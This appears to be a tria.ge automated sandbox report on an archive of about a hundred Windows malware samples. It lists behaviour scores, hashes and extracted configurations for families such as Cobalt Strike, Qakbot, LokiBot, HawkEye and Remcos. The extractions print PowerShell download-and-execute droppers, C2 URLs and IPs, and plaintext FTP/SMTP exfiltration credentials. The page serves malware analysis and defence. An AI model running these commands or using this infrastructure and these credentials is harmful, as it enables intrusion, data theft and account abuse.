Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

foo/0044d6...f7.exe

windows7_x64

1

foo/0044d6...f7.exe

windows10_x64

1

foo/034e4c...a9.exe

windows7_x64

4

foo/034e4c...a9.exe

windows10_x64

4

foo/035fa2...72.exe

windows7_x64

10

foo/035fa2...72.exe

windows10_x64

10

foo/04884a...1b.exe

windows7_x64

8

foo/04884a...1b.exe

windows10_x64

8

foo/06ed82...59.exe

windows7_x64

7

foo/06ed82...59.exe

windows10_x64

7

foo/07470b...68.exe

windows7_x64

8

foo/07470b...68.exe

windows10_x64

8

foo/078adb...c0.exe

windows7_x64

10

foo/078adb...c0.exe

windows10_x64

10

foo/09e5c8...b4.exe

windows7_x64

1

foo/09e5c8...b4.exe

windows10_x64

1

foo/0becfe...f4.exe

windows7_x64

10

foo/0becfe...f4.exe

windows10_x64

10

foo/1a78d3...a3.exe

windows7_x64

5

foo/1a78d3...a3.exe

windows10_x64

5

foo/1ffe82...a6.exe

windows7_x64

10

foo/1ffe82...a6.exe

windows10_x64

10

foo/255028...e1.dll

windows7_x64

1

foo/255028...e1.dll

windows10_x64

1

foo/27601d...cc.exe

windows7_x64

8

foo/27601d...cc.exe

windows10_x64

8

foo/27f911...49.exe

windows7_x64

10

foo/27f911...49.exe

windows10_x64

10

foo/28408c...c5.exe

windows7_x64

10

foo/28408c...c5.exe

windows10_x64

10

foo/296822...e4.dll

windows7_x64

3

foo/296822...e4.dll

windows10_x64

3

foo/2de7b8...a4.exe

windows7_x64

10

foo/2de7b8...a4.exe

windows10_x64

10

foo/2e00df...8b.exe

windows7_x64

9

foo/2e00df...8b.exe

windows10_x64

9

foo/2e90a1...22.exe

windows7_x64

6

foo/2e90a1...22.exe

windows10_x64

6

foo/2f215e...b0.dll

windows7_x64

10

foo/2f215e...b0.dll

windows10_x64

10

foo/30bc06...3e.exe

windows7_x64

10

foo/30bc06...3e.exe

windows10_x64

10

foo/312e67...f3.exe

windows7_x64

4

foo/312e67...f3.exe

windows10_x64

4

foo/383497...1b.exe

windows7_x64

10

foo/383497...1b.exe

windows10_x64

10

foo/39555e...ec.exe

windows7_x64

10

foo/39555e...ec.exe

windows10_x64

10

foo/39e531...04.exe

windows7_x64

10

foo/39e531...04.exe

windows10_x64

10

foo/3aba72...cd.exe

windows7_x64

1

foo/3aba72...cd.exe

windows10_x64

1

foo/406c9b...fe.exe

windows7_x64

10

foo/406c9b...fe.exe

windows10_x64

10

foo/457cfd...ca.exe

windows7_x64

7

foo/457cfd...ca.exe

windows10_x64

7

foo/4761e4...60.exe

windows7_x64

8

foo/4761e4...60.exe

windows10_x64

8

foo/487f1b...04.exe

windows7_x64

8

foo/487f1b...04.exe

windows10_x64

7

foo/4a74c9...cf.exe

windows7_x64

10

foo/4a74c9...cf.exe

windows10_x64

10

foo/4b2d78...4b.exe

windows7_x64

8

foo/4b2d78...4b.exe

windows10_x64

8

foo/4c49c2...ba.exe

windows7_x64

1

foo/4c49c2...ba.exe

windows10_x64

1

foo/4cfe8f...77.exe

windows7_x64

9

foo/4cfe8f...77.exe

windows10_x64

9

foo/4ea454...13.exe

windows7_x64

8

foo/4ea454...13.exe

windows10_x64

8

foo/52d6c5...7e.exe

windows7_x64

7

foo/52d6c5...7e.exe

windows10_x64

7

foo/55fc11...e0.exe

windows7_x64

foo/55fc11...e0.exe

windows10_x64

10

foo/59f0fb...06.exe

windows7_x64

1

foo/59f0fb...06.exe

windows10_x64

1

foo/5b1c0d...cb.exe

windows7_x64

1

foo/5b1c0d...cb.exe

windows10_x64

1

foo/5bc72a...ea.exe

windows7_x64

8

foo/5bc72a...ea.exe

windows10_x64

8

foo/5d3305...2a.exe

windows7_x64

7

foo/5d3305...2a.exe

windows10_x64

7

foo/5d9775...39.exe

windows7_x64

8

foo/5d9775...39.exe

windows10_x64

8

foo/60121e...3e.exe

windows7_x64

9

foo/60121e...3e.exe

windows10_x64

9

foo/62565a...fd.exe

windows7_x64

10

foo/62565a...fd.exe

windows10_x64

10

foo/62a3fd...64.exe

windows7_x64

8

foo/62a3fd...64.exe

windows10_x64

10

foo/63e9ce...d0.exe

windows7_x64

8

foo/63e9ce...d0.exe

windows10_x64

8

foo/6497ba...c5.exe

windows7_x64

10

foo/6497ba...c5.exe

windows10_x64

10

foo/698cc8...31.exe

windows7_x64

7

foo/698cc8...31.exe

windows10_x64

7

foo/6f2c5c...d5.exe

windows7_x64

7

foo/6f2c5c...d5.exe

windows10_x64

7

foo/798f5e...ba.exe

windows7_x64

10

foo/798f5e...ba.exe

windows10_x64

10

foo/7aec86...51.exe

windows7_x64

1

foo/7aec86...51.exe

windows10_x64

1

foo/84bf6e...64.exe

windows7_x64

8

foo/84bf6e...64.exe

windows10_x64

8

foo/907b7d...b3.exe

windows7_x64

8

foo/907b7d...b3.exe

windows10_x64

8

foo/928f1d...ee.exe

windows7_x64

1

foo/928f1d...ee.exe

windows10_x64

1

foo/9401b0...6c.exe

windows7_x64

1

foo/9401b0...6c.exe

windows10_x64

1

foo/97dd87...84.exe

windows7_x64

10

foo/97dd87...84.exe

windows10_x64

10

foo/9b8c48...a4.exe

windows7_x64

8

foo/9b8c48...a4.exe

windows10_x64

8

foo/9cde71...cd.exe

windows7_x64

6

foo/9cde71...cd.exe

windows10_x64

6

foo/9d3438...4b.exe

windows7_x64

8

foo/9d3438...4b.exe

windows10_x64

1

foo/9f8818...2d.exe

windows7_x64

8

foo/9f8818...2d.exe

windows10_x64

3

foo/a17bdc...cf.exe

windows7_x64

9

foo/a17bdc...cf.exe

windows10_x64

9

foo/a29811...46.exe

windows7_x64

10

foo/a29811...46.exe

windows10_x64

10

foo/aa3b51...52.exe

windows7_x64

10

foo/aa3b51...52.exe

windows10_x64

10

foo/acf0b7...c4.exe

windows7_x64

8

foo/acf0b7...c4.exe

windows10_x64

8

foo/aeca5c...f7.exe

windows7_x64

1

foo/aeca5c...f7.exe

windows10_x64

1

foo/b10714...f3.exe

windows7_x64

8

foo/b10714...f3.exe

windows10_x64

8

foo/b23652...9f.exe

windows7_x64

6

foo/b23652...9f.exe

windows10_x64

6

foo/b514b5...fc.exe

windows7_x64

1

foo/b514b5...fc.exe

windows10_x64

1

foo/b64196...23.exe

windows7_x64

7

foo/b64196...23.exe

windows10_x64

7

foo/b693df...60.exe

windows7_x64

7

foo/b693df...60.exe

windows10_x64

7

foo/b6e7c9...bc.exe

windows7_x64

10

foo/b6e7c9...bc.exe

windows10_x64

10

foo/b7d5f0...4a.exe

windows7_x64

10

foo/b7d5f0...4a.exe

windows10_x64

10

foo/ba2d46...29.exe

windows7_x64

1

foo/ba2d46...29.exe

windows10_x64

1

foo/bad78e...e5.exe

windows7_x64

9

foo/bad78e...e5.exe

windows10_x64

9

foo/bc6536...b9.exe

windows7_x64

10

foo/bc6536...b9.exe

windows10_x64

10

foo/be85e0...2c.exe

windows7_x64

1

foo/be85e0...2c.exe

windows10_x64

1

foo/c914b1...ee.exe

windows7_x64

3

foo/c914b1...ee.exe

windows10_x64

3

foo/c944ea...cc.exe

windows7_x64

8

foo/c944ea...cc.exe

windows10_x64

8

foo/cad363...8b.exe

windows7_x64

6

foo/cad363...8b.exe

windows10_x64

6

foo/cd89b6...df.exe

windows7_x64

8

foo/cd89b6...df.exe

windows10_x64

8

foo/d81e76...c4.exe

windows7_x64

10

foo/d81e76...c4.exe

windows10_x64

10

foo/d86d2c...08.exe

windows7_x64

10

foo/d86d2c...08.exe

windows10_x64

10

foo/d8e37d...98.exe

windows7_x64

9

foo/d8e37d...98.exe

windows10_x64

9

foo/dea515...e1.exe

windows7_x64

10

foo/dea515...e1.exe

windows10_x64

6

foo/dfcc55...b8.exe

windows7_x64

7

foo/dfcc55...b8.exe

windows10_x64

7

foo/e03bd4...fe.exe

windows7_x64

8

foo/e03bd4...fe.exe

windows10_x64

8

foo/e16ec7...2d.exe

windows7_x64

8

foo/e16ec7...2d.exe

windows10_x64

8

foo/e61c0e...0e.exe

windows7_x64

7

foo/e61c0e...0e.exe

windows10_x64

7

foo/e78fad...51.exe

windows7_x64

8

foo/e78fad...51.exe

windows10_x64

8

foo/e7ad45...88.exe

windows7_x64

3

foo/e7ad45...88.exe

windows10_x64

3

foo/e95678...8f.exe

windows7_x64

1

foo/e95678...8f.exe

windows10_x64

1

foo/edf723...ee.dll

windows7_x64

1

foo/edf723...ee.dll

windows10_x64

1

foo/f2366f...f5.exe

windows7_x64

1

foo/f2366f...f5.exe

windows10_x64

1

foo/f645a9...1f.exe

windows7_x64

1

foo/f645a9...1f.exe

windows10_x64

1

foo/f65e75...56.exe

windows7_x64

1

foo/f65e75...56.exe

windows10_x64

1

foo/f66028...2b.exe

windows7_x64

8

foo/f66028...2b.exe

windows10_x64

8

foo/f6c1c7...89.exe

windows7_x64

10

foo/f6c1c7...89.exe

windows10_x64

10

foo/fbab90...7c.exe

windows7_x64

7

foo/fbab90...7c.exe

windows10_x64

7

foo/fcdc00...b3.exe

windows7_x64

8

foo/fcdc00...b3.exe

windows10_x64

8

foo/fffb61...ba.exe

windows7_x64

1

foo/fffb61...ba.exe

windows10_x64

1

Sharing

Copy URL
Twitter E-mail

General

  • Target

    foo.zip

  • Size

    148.2MB

  • Sample

    200811-8q4fq2yyya

  • MD5

    875294d0dba88dbc80c33a5cbb110b41

  • SHA1

    3727db2a114f7302be5d5a3ef212bc0922060346

  • SHA256

    46dc49be65d7165e2a6009854a4f27f0088230199e61e0555cb1bd266535874a

  • SHA512

    4482e49c33c076cbde30a4da9c7283ef9cc67ae3ae75d9217ea402c206f6fc82aa4ffe90b76ab18c79cda6a7c1e302c02abda6736d594df2b2db273d013e07ab

Score
10/10
agentteslaazorultbetabotcobaltstrikegluptebagozi_ifsbhawkeyehawkeye_rebornimminentlimeratlokibotm00nd3v_loggermatrixnjratqakbotremcossmokeloadertofseewarzoneratxmrig1535648626adwareaspackv2backdoorbankerbootkitbotnetdiscoverydropperevasioninfostealerkeyloggerloaderminerpersistenceransomwareratspywarestealertrojanupxvmprotect

Malware Config

Extracted

Family

cobaltstrike

C2

http://www.google.com:443/__utm.gif

Attributes
  • access_type

    512

  • beacon_type

    2048

  • host

    www.google.com,/__utm.gif

  • http_header1

    AAAACQAAABJ1dG1hYz1VQS0yMjAyNjA0LTIAAAAJAAAAB3V0bWNuPTEAAAAJAAAAEHV0bWNzPUlTTy04ODU5LTEAAAAJAAAAD3V0bXNyPTEyODB4MTAyNAAAAAkAAAAMdXRtc2M9MzItYml0AAAACQAAAAt1dG11bD1lbi1VUwAAAAoAAAAoSG9zdDogdHJhbnNsYXRlc2VydmljZXVwZGF0ZS5hcHBzcG90LmNvbQAAAAcAAAAAAAAACAAAAAIAAAAGX191dG1hAAAABQAAAAV1dG1jYwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • http_header2

    AAAACgAAACZDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQAAAAcAAAAAAAAAAgAAAAZVQS0yMjAAAAABAAAAAi0yAAAABQAAAAV1dG1hYwAAAAkAAAAHdXRtY249MQAAAAkAAAAQdXRtY3M9SVNPLTg4NTktMQAAAAkAAAAPdXRtc3I9MTI4MHgxMDI0AAAACQAAAAx1dG1zYz0zMi1iaXQAAAAJAAAAC3V0bXVsPWVuLVVTAAAACgAAAChIb3N0OiB0cmFuc2xhdGVzZXJ2aWNldXBkYXRlLmFwcHNwb3QuY29tAAAABwAAAAEAAAAEAAAAAA==

  • http_method1

    GET

  • http_method2

    POST

  • maxdns

    255

  • pipe_name

    \\%s\pipe\msagent_%x

  • polling_time

    60000

  • port_number

    443

  • sc_process32

    %windir%\syswow64\rundll32.exe

  • sc_process64

    %windir%\sysnative\rundll32.exe

  • state_machine

    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC+xef42wyX1NAUR5Ukrnj2L8wg2GQ3+zg6SV5+gTlXxdgo8apUHH/mtKv7A+Fa5aReI1QBvVbMdkwq7A1YwJpBtFUBouokiqs8MjBWWrcftqQno/goPu3jDA1eHNyB8Hn+E4URKzRBBwQBduCA6fvUK83z/jAh062sZrZaFGE6dwIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • unknown1

    6.71092736e+08

  • unknown2

    AAAABAAAAAIAAAAPAAAAAgAAAA8AAAACAAAACgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • uri

    /___utm.gif

  • user_agent

    Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)

Extracted

Family

smokeloader

Version

2018

C2

http://segodnya.bit/biologe/

rc4.i32
1
0x4e29ab2c
rc4.i32
1
0x693d7eba

Extracted

Family

lokibot

C2

http://clogwars.com/~zadmin/lmark/seng/link.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

http://hawkcarts.info/jeff/five/fre.php

Extracted

Credentials

  • Protocol:     ftp
  • Host:
    files.000webhost.com
  • Port:
    21
  • Username:
    foroni

Extracted

Language
ps1
Deobfuscated
1
invoke-expression (new-object net.webclient).downloadstring("https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1")
2
invoke-expression (new-object net.webclient).downloadstring("https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1")
3
invoke-mainworker -command "C:\\Users\\Admin\\AppData\\Local\\Temp\\xujysixlggxpjklaxynlrhabicstv.txt"
4
URLs
ps1.dropper

https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1
ps1.dropper

https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1

Extracted

Family

qakbot

Campaign

1535648626

Credentials

  • Protocol:     ftp
  • Host:
    37.60.244.211
  • Port:
    21
  • Username:
    backup_manager@garciasdrywall.com
  • Password:
    4AsEzIaMwi2d

  • Protocol:     ftp
  • Host:
    198.38.77.162
  • Port:
    21
  • Username:
    backup_manager@worldexpresscargo.com
  • Password:
    kJm6DKVPfyiv

  • Protocol:     ftp
  • Host:
    61.221.12.26
  • Port:
    21
  • Username:
    logger@ostergift.com
  • Password:
    346HZGCMlwecz9S

  • Protocol:     ftp
  • Host:
    67.222.137.18
  • Port:
    21
  • Username:
    logger@grupocrepusculo.net
  • Password:
    p4a8k6fE1FtA3pR

  • Protocol:     ftp
  • Host:
    107.6.152.61
  • Port:
    21
  • Username:
    logger@trussedup.com
  • Password:
    RoP4Af0RKAAQ74V
C2

190.185.219.110:443

73.74.72.141:443

65.116.179.83:443

50.198.141.161:2078

70.183.154.153:995

68.49.120.179:443

70.94.109.57:443

24.45.54.50:2222

190.80.21.204:2222

216.201.159.118:443

74.88.210.56:995

75.189.235.216:443

47.48.236.98:2222

68.59.209.183:995

75.3.101.153:443

108.17.25.169:443

185.219.83.73:443

184.180.157.203:2222

207.178.109.161:443

174.48.72.160:443

Extracted

Language
ps1
Deobfuscated
1
invoke-expression (new-object net.webclient).downloadstring("https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1")
2
invoke-expression (new-object net.webclient).downloadstring("https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1")
3
invoke-mainworker -command "C:\\Users\\Admin\\AppData\\Local\\Temp\\dworresfxzjxabptoatbbqjfpcfgrc.txt"
4
URLs
ps1.dropper

https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1
ps1.dropper

https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1

Extracted

Family

hawkeye_reborn

Version

9.0.1.6

Credentials

  • Protocol:     smtp
  • Host:
    mail.mwanzompya.com
  • Port:
    587
  • Username:
    info@mwanzompya.com
  • Password:
    mwanzo#05
Mutex

382536c5-1156-46e8-b78f-7f58423a46e3

Attributes
  • fields

    map[_AntiDebugger:false _AntiVirusKiller:false _BotKiller:false _ClipboardLogger:true _Delivery:0 _DisableCommandPrompt:false _DisableRegEdit:false _DisableTaskManager:false _Disablers:false _EmailPassword:mwanzo#05 _EmailPort:587 _EmailSSL:false _EmailServer:mail.mwanzompya.com _EmailUsername:info@mwanzompya.com _ExecutionDelay:10 _FTPPort:0 _FTPSFTP:false _FakeMessageIcon:0 _FakeMessageShow:false _FileBinder:false _HideFile:false _HistoryCleaner:false _Install:false _InstallLocation:0 _InstallStartup:false _InstallStartupPersistance:false _KeyStrokeLogger:true _LogInterval:10 _MeltFile:false _Mutex:382536c5-1156-46e8-b78f-7f58423a46e3 _PasswordStealer:true _ProcessElevation:false _ProcessProtection:false _ScreenshotLogger:false _SystemInfo:false _Version:9.0.1.6 _WebCamLogger:false _WebsiteBlocker:false _WebsiteVisitor:false _WebsiteVisitorVisible:false _ZoneID:false]

  • name

    HawkEye Keylogger - Reborn v9, Version=9.0.1.6, Culture=neutral, PublicKeyToken=null

Extracted

Credentials

  • Protocol:     smtp
  • Host:
    mail.mwanzompya.com
  • Port:
    587
  • Username:
    info@mwanzompya.com
  • Password:
    mwanzo#05

Extracted

Family

remcos

C2

185.244.29.195:1991

Targets

    • Target

      foo/0044d66e4abf7c4af6b5d207065320f7

    • Size

      127KB

    • MD5

      0044d66e4abf7c4af6b5d207065320f7

    • SHA1

      07e73ac58bee7bdc26d289bb2697d2588a6b7e64

    • SHA256

      b6d19c3e6e82bbde62984f50144ce4d98a18871374ec5d313489d5831317c480

    • SHA512

      25633ea2e3cc78262ba69de30d2d3b7f6c013ce3bcbad2eda3c424ac50d7c0b7169372c5ad2b2cd81748ea0622f3db5ba3429f0d3ecfd3feabbfc65d961af5dd

    Score
    1/10
    behavioral1behavioral2

    • Target

      foo/034e4c62965f8d5dd5d5a2ce34a53ba9

    • Size

      416KB

    • MD5

      034e4c62965f8d5dd5d5a2ce34a53ba9

    • SHA1

      edc165e7e833a5e5345f675467398fb38cf6c16f

    • SHA256

      52cb02da0462fdd08d537b2c949e2e252f7a7a88354d596e9f5c9f1498d1c68f

    • SHA512

      c2de626a339d21e5fd287c0e625bca02c770e09f9cad01005160d473164fa8edc5fc381b6ddd01293bdd31f2d7de1b0171674d12ec428e42a97d0ed0b7efb9dd

    Score
    4/10
    behavioral3behavioral4

    • Target

      foo/035fa2f2fae0a8fad733686a7d9ea772

    • Size

      291KB

    • MD5

      035fa2f2fae0a8fad733686a7d9ea772

    • SHA1

      411ee99b26bb612b1905b0c7254129fb1dd0cb56

    • SHA256

      f823ee1362132d0c4cb632829abbaae16b7ae8f938e86a10bdab3897e4f5dc8c

    • SHA512

      9a58f3b940e83e79fd7c7353b8d20947ab45ee48c617217f7c5ac58b1a0d0b5904eda1d49eb118a55f309291055b50b4710a6ab598ae5b29bbb6ff541ab599f1

    Score
    10/10
    smokeloaderbackdoortrojan

    • SmokeLoader

      Modular backdoor trojan in use since 2014.

      trojanbackdoorsmokeloader

    • Maps connected drives based on registry

      Disk information is often read in order to detect sandboxing environments.

    behavioral5behavioral6

    • Target

      foo/04884a82d01d733f245d921e1f74fb1b

    • Size

      2.9MB

    • MD5

      04884a82d01d733f245d921e1f74fb1b

    • SHA1

      975c743feccce12419d4d72f26c2d44c8591118a

    • SHA256

      e3d13acdbf704b60569fad130fec670ff20d99183fb4bfb32f339dd3138a5f2f

    • SHA512

      c7f26c9656a14a2865da01e7903f29b2474e5fb3bb7a054d09fdd7ea476f7c3666bf4b3fc87e676c4829c0f51942273bb8161b448e42246898985874389a072c

    Score
    8/10
    bootkitpersistence

    • Executes dropped EXE

    • Checks BIOS information in registry

      BIOS information is often read in order to detect sandboxing environments.

    • Loads dropped DLL

    • Writes to the Master Boot Record (MBR)

      Bootkits write to the MBR to gain persistence at a level below the operating system.

      bootkitpersistence
    behavioral7behavioral8

    • Target

      foo/06ed82e88e1f68cc08602d7cd8ec5f59

    • Size

      12.2MB

    • MD5

      06ed82e88e1f68cc08602d7cd8ec5f59

    • SHA1

      37d4750e5f22cc395dd721dd5df73aeccc095bb5

    • SHA256

      43eebbd84e92a99b2bbca0b578df68dc07756e2c5fe908c668ac8c69f934a7e5

    • SHA512

      63060f8723b2ad50b8bfc225af22156215d5362bcf4a3ad77d9fe9059414b8ba69679f5fcf83159da224f165a83ebee74a306300f41205a887a06ec0bb86f895

    Score
    7/10
    discovery

    • Loads dropped DLL

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

      discovery
    behavioral9behavioral10

    • Target

      foo/07470b6ede84f02ec31ab0a601cdc068

    • Size

      199KB

    • MD5

      07470b6ede84f02ec31ab0a601cdc068

    • SHA1

      2ca5cc5bf36cf0dfc95a128267e5ca1bdead991b

    • SHA256

      c7307db0fdd462a0415cec9cb707045f575d28ae18f2db8efcedd7a2db3079ac

    • SHA512

      002bd7b302ce582ae8921f2613ab340a366a5928e32d1bddf6fbfc16f8fbde2ea93668775d418ea1b3375a32eff24d3f8e32a8f17d7549a743b545f873a0dab7

    Score
    8/10

    • Executes dropped EXE

    • Loads dropped DLL

    behavioral11behavioral12

    • Target

      foo/078adb95b1a0a6449d8c4ece796deac0

    • Size

      349KB

    • MD5

      078adb95b1a0a6449d8c4ece796deac0

    • SHA1

      412cbff9af426e0af43b9b860150c7c30ebce654

    • SHA256

      94a65945d7cebe9755b6cb5cffe7139c848bcbbf5988b07a3d195c57f5e44a89

    • SHA512

      32b58760617c268de6571bae946d3757f021fc975e3546333371d1667e592057a71956578039e75ad953e8a8aff18d1f871e2fe360abe13a9866f1d56f5ea3e0

    Score
    10/10
    imminentspywaretrojan

    • Imminent RAT

      Remote-access trojan based on Imminent Monitor remote admin software.

      trojanspywareimminent

    • Drops desktop.ini file(s)

    behavioral13behavioral14

    • Target

      foo/09e5c88a0592763e0c4f30fb88d663b4

    • Size

      713KB

    • MD5

      09e5c88a0592763e0c4f30fb88d663b4

    • SHA1

      939a8f3e7477ce8ee6406ac2b8aa58bd8399e1b4

    • SHA256

      9aac9319312f83811ad3ee68cd0ae467c088fa484ce921271be0382dc0d027fc

    • SHA512

      aa8aaa125fc6a47db42b882c960dc52e16df2a308675382f761a66060da414c26345fa526c92e322104b563372f7de6c305645d7a626fd5e4b5c100bdaba089b

    Score
    1/10
    behavioral15behavioral16

    • Target

      foo/0becfedf4d0b9ad5251aca33274a4cf4

    • Size

      443KB

    • MD5

      0becfedf4d0b9ad5251aca33274a4cf4

    • SHA1

      5d6faf04a6215b08988f289373f3b239d5878d06

    • SHA256

      235b35c4574f4d28ac034e7fbd4827384f6243d591d1d1bd76e320905f5b0242

    • SHA512

      0e835c83ff46c74acf6140bd434666ddffd2c0aa9875fc9899daff62b473ab98ee0947c226e9ffd8c4322b418574e9f5e2d2d32415b232667921c3db404dcd35

    Score
    10/10
    aspackv2evasionpersistencetrojanupx

    • Modifies WinLogon for persistence

      persistence

    • Modifies firewall policy service

      evasion

    • Modifies security service

      evasion

    • UAC bypass

      evasiontrojan

    • Windows security bypass

      evasiontrojan

    • ASPack v2.12-2.42

      Detects executables packed with ASPack v2.12-2.42

      aspackv2

    • Disables Task Manager via registry modification

      evasion

    • Executes dropped EXE

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

      upx

    • Drops startup file

    • Loads dropped DLL

    • Windows security modification

      evasiontrojan

    • Adds Run key to start application

      persistence

    • Checks whether UAC is enabled

      evasiontrojan

    • Suspicious use of SetThreadContext

    behavioral17behavioral18

    • Target

      foo/1a78d313f2891bd468f78694814a28a3

    • Size

      5.5MB

    • MD5

      1a78d313f2891bd468f78694814a28a3

    • SHA1

      7b10daf92b6bb599c68379909fbc951955e9335e

    • SHA256

      b8953f266d0ec05808dd5ba4799986c61bfc4d6e5308b0da84cbc8afe19de4df

    • SHA512

      4a9d76516888a4abff4acb29712abdc65674d5a9a3e69b0e30fa0cf815267d7d45f02d4879383232eb44c5503256af3adc4cb3db201e603816ccc983666475cb

    Score
    5/10

    • Drops file in System32 directory

    • Suspicious use of NtSetInformationThreadHideFromDebugger

    behavioral19behavioral20

    • Target

      foo/1ffe827beb75335731cb6f052a8ec3a6

    • Size

      468KB

    • MD5

      1ffe827beb75335731cb6f052a8ec3a6

    • SHA1

      381ff47af182f52185fe2ff8d01453c5f611b04a

    • SHA256

      bf26329c083407931e46c85220e294904dc532e1095823290c04537f15316e47

    • SHA512

      fe1d68657aa99cb2949aa4aee3c12a70ba4f1fa9542f4606fb6a63627c593c74ce2188ebba15c2e366d8c79c4591e2bc048505abf4eed16d156a9b2ecf6334c8

    Score
    10/10
    warzoneratinfostealerpersistencerat

    • WarzoneRat, AveMaria

      WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

      ratinfostealerwarzonerat

    • Warzone RAT Payload

      rat

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

      persistence
    behavioral21behavioral22

    • Target

      foo/255028f2f37838e92f84f27c68aaf4e1

    • Size

      536KB

    • MD5

      255028f2f37838e92f84f27c68aaf4e1

    • SHA1

      64e6d06aba93b91fbda44364278f2a91e91c6cf3

    • SHA256

      db04d912a4fa503b27bea546ca8160b040e3eaf8eabfa5ee0dc30b64738976e2

    • SHA512

      be1f9a5005c9c446a100891c9c955336e011ba550ca7c1f5dd4dd9c3f3041ff20fa30445f117331b6d121b0e89361bead40b981c50f01ce185fa3acf2b7d00d8

    Score
    1/10
    behavioral23behavioral24

    • Target

      foo/27601d095e5b3761d9289584415a73cc

    • Size

      565KB

    • MD5

      27601d095e5b3761d9289584415a73cc

    • SHA1

      9570f23b5abe2ef46a23ded17adb2fb6c203a201

    • SHA256

      749f5e042b317dc4e989c174d92936ef83d9d4fbf4c190f0e5b759b858b15cf4

    • SHA512

      066263bf8f11d48b4e3715b8962686e0ca32aa8647b642a193b5331513538a44bb49edad5ef6a08ae6cc6401504fadc7adf38efb07c9ae9560e947aac443e0e7

    Score
    8/10
    discovery

    • Executes dropped EXE

    • Loads dropped DLL

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

      discovery
    behavioral25behavioral26

    • Target

      foo/27f9116902c35a9b784c703762bbd249

    • Size

      1.3MB

    • MD5

      27f9116902c35a9b784c703762bbd249

    • SHA1

      1f398a7f5bb032a30c2207e5e692524691b8a09e

    • SHA256

      548b424bedcb831086fb9ab5b6e284a7a71a53e430acad99155153a869844570

    • SHA512

      c046022a16f572eda5f60484d61190491579ee0d9d883d8f760859bbde0730dcfe4a603f847162d8901f6a87140da6a9c53134e8b7c2f9fa6192584765e94ff6

    Score
    10/10
    betabotbackdoorbotnetevasiontrojan

    • BetaBot

      Beta Bot is a Trojan that infects computers and disables Antivirus.

      trojanbackdoorbotnetbetabot

    • Checks whether UAC is enabled

      evasiontrojan

    • Suspicious use of NtSetInformationThreadHideFromDebugger

    • Suspicious use of SetThreadContext

    behavioral27behavioral28

    • Target

      foo/28408caa2961caecd35c9f8f7c1aecc5

    • Size

      290KB

    • MD5

      28408caa2961caecd35c9f8f7c1aecc5

    • SHA1

      2df15d3bc4f7623ca3a18665b3c666ec8b70baa6

    • SHA256

      fe99d5ab8be0c9830fd97c1ed127b0c236da75b43a42a58fcd46cb8d46dc3c34

    • SHA512

      a4fdb80d3ac39a2fa46f19c8b5a803ded144e97dd7a3f194177ddaba15b8e0a0486e7b4de2e8c9c957eac4398487fe5872e54ad8e866e68e0beb283c937d0cbd

    Score
    10/10
    lokibotspywarestealertrojan
    behavioral29behavioral30

    • Target

      foo/29682275a385f42634ee312db7f666e4

    • Size

      8.3MB

    • MD5

      29682275a385f42634ee312db7f666e4

    • SHA1

      660661c84c925dd781c327bbdd519b89bcf378c3

    • SHA256

      9bf25bf1e0f9bfb8381dc1ec57ee256ef77d294259468fc17bbab9fe50b8b4a3

    • SHA512

      c03ee099bfb533ae5f88a31499e428588de0bbbc2864a057873355d26b89a9a3b8da73a706fc08e8633b09e73018fbf4406fd2c8cc7738b605a0b2eeac23db36

    Score
    3/10
    behavioral31behavioral32

    • Target

      foo/2de7b886ed3bf5455694d76ac69a96a4

    • Size

      99KB

    • MD5

      2de7b886ed3bf5455694d76ac69a96a4

    • SHA1

      8e80636a30b25b9aba51bc048882a43b9914f631

    • SHA256

      1cc983ae1831efb88cafacc5e7efcdf60ee5d3637a3d8e2336f14fa2bf53e606

    • SHA512

      abe16eb7e94e947507a3276e3d94be5e4c56055263e5aa4ebb5449dc969401d3659460bc152a67001a01874054a4968fcaa9720f81514ab6560ae18cd637f9ca

    Score
    10/10
    tofseexmrigevasionminerpersistencetrojan

    • Tofsee

      Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

      trojantofsee

    • Windows security bypass

      evasiontrojan

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

      minerxmrig

    • XMRig Miner Payload

      miner

    • Creates new service(s)

      persistence

    • Executes dropped EXE

    • Modifies Windows Firewall

      evasion

    • Sets service image path in registry

      persistence

    • Deletes itself

    • Looks up external IP address via web service

